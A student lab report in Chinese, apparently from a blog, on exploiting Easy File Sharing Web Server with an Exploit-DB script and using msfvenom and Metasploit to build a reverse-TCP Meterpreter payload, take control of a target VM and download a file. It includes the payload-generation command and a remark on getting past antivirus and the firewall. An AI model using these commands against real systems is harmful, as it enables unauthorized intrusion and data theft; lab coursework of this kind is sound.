一、漏洞渗透测试

1、靶机安装easy file sharing server(efssetup_2018.zip)

2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100

3、利用该漏洞,使得靶机运行计算器。P116-119

具体实现过程:

  1. 使用namp扫描目标计算机:

查看目标计算机的相关信息

漏洞渗透的简单测试

  1. 查找EasyFileSharing的有关漏洞:

漏洞渗透的简单测试

  1. 查看脚本代码:

​ 截图

漏洞渗透的简单测试

漏洞渗透的简单测试

漏洞渗透的简单测试

  1. 执行该脚本:

​ 使用命令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 目标IP

漏洞渗透的简单测试

  1. 执行结果:

​ Easy File Sharing Web Server服务崩溃,运行计算机

漏洞渗透的简单测试

二、Metasploit应用

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

P121-123;140-145

具体过程:

  1. 生成一个被控端

命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /root/payload.exe

漏洞渗透的简单测试

生成的文件:

漏洞渗透的简单测试

  1. 生成主控端后,在目标计算机运行被控端,获得目标计算机的控制权,如图所示:

image-20200517210441798

  1. 对目标计算机的控制操作

查看目标计算机的文件信息,并下载文件hxy.txt文件

Ls //查看

Download 文件名 //下载文件

漏洞渗透的简单测试

漏洞渗透的简单测试

总结:经过对多台不同的虚拟机的测试尝试,初步掌握了漏洞测试的基本操作,以及加深了对漏洞渗透测试的理解。遇到的问题:生成的被控端payload会被系统辨别为木马,需要将被控端进行压缩或者关闭防火墙,才能将被控端发送到靶机上。尝试过在物理机上运行Easy File Sharing Web Server服务,然后在Kali上运行相应的py脚本,kali上显示运行成功,但是计算机上没有任何反应,猜想是防火墙阻止了该脚本的运行。

相关文章:

  • 2022-12-23
  • 2021-08-09
  • 2021-05-03
  • 2021-10-12
  • 2021-08-23
  • 2021-06-24
  • 2022-12-23
猜你喜欢
  • 2022-01-02
  • 2021-09-27
  • 2021-12-22
  • 2021-11-08
  • 2021-08-08
相关资源
相似解决方案